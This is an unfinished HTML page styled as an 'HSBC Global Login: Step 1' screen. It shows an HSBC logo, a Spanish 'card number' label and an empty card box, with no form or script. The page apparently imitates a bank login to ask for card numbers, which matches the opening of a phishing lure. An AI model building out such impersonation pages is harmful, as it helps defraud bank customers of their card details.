<!DOCTYPE html>
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta charset='UTF-8'/>
	<meta http-equiv="X-UA-Compatible" content="IE=9,IE=10,IE=11,IE=Edge,chrome=1">
	<meta name="force-rendering" content="webkit">
	<meta name="renderer" content="webkit">
    <meta name="description" content="" />
	<meta http-equiv="content-type" content="text/html; charset=UTF-8">
	<meta http-equiv="Cache-Control"
	content="max-age=1,s-maxage=0, no-cache, no-store, must-revalidate, private" />
	<meta http-equiv="Pragma" content="no-cache" />
	<meta http-equiv="Expires" content="Sat, 6 May 1995 12:00:00 GMT" />

    <title>HSBC Global Login: Step 1</title>

    <style type="text/css">

        body{
            margin: 0;
            padding: 0;
        }


        a.jsSliderTrigger {
			position:relative;
			z-index:99;
		}
		.familiarName1, .familiarName2 {
			text-transform: capitalize;
		}
		.logonBox_Center {
			margin:0 auto!important;
		}		
		.pb30 {
			padding-bottom:30px !important;
		}
				
		
		.banner{
			display:none;
		}
		
		.banner.cam10 {
			display:block;
		}
					
		.banner-padding{
		padding-top:4px;	

		}

		.icon-disc{
		display: inline-block;
		width: 5px;
		height: 5px;
		background-color: black;
		border-radius: 5px;
		margin-right: 5px;
		}
		
		.textAlign{
			padding:0;
			line-height:16px;
		}
		.lastbutton { margin-right: 0px !important; }
		.hidden {display:none!important;}
        
        .header{
			width: 100%;
			margin:0;
			position: relative;
			height:250px;
			background-color: rgba(255, 255, 255, 0.459);
			box-shadow: 0px 0px  80px rgba(0, 0, 0, 0.418);
			box-sizing: border-box; 
        }
        #logo{
            padding: 30px 24px 30px 15px;
            position: relative;
            left: 30%;
            top: 20%;
        }
		#logo img{
			display: block;
			width: 35%;
			height: 100px;
		}
		#logo img{
            mix-blend-mode: multiply;
            filter: saturate(3);
        }

		@media (min-width: 481px) and (max-width: 767px){
		 	.header{
				width:100%;
				height: ;
			}	
			#logo{
				position: relative;
				left:10%;
				top: 15%;
        	}
			#logo img{
				display: block;
				width: 52%;
				height: 64px;
				
			}
		}

		@media (min-width: 1439px) and (max-width: 1920px){
			.header{
				width:100%;
				height: 350px;
			}	
			#logo{
				position: relative;
				left:33%;
				top: 25%;
        	}
			#logo img{
				display: block;
				width: 30%;
				height: 100px;
			}
		}

        
		
		
		

		.contenedor1{
			padding: 50px 25px 50px 25px;
			
		}

		#encabezado1{
			display: block;
			font-size: 30px;
			color: rgb(0, 0, 0);
			text-align: center;
			font-family: 'Open Sans', Arial, sans-serif;
		}

		.card1{
			width:400px;
			height:200px;
			position: relative;
			left: 40%;
            top: 30%;
			background-color: rgb(141, 141, 141);
		}






     /*   <h1 class="hiddenHeading" aria-hidden="false">HSBC</h1>*/
    </style>
</head>


<body>
    <div class="header">
        <div id="logo">
            <img src="Image/Logo1.png" alt="HSBC">
        </div>
    </div>
    <div class="contenedor1">
		<label id="encabezado1">Número de tarjeta</label>
        <div class="card1">

		</div>
    </div>
    <div>

    </div>



        


    
</body>
</html>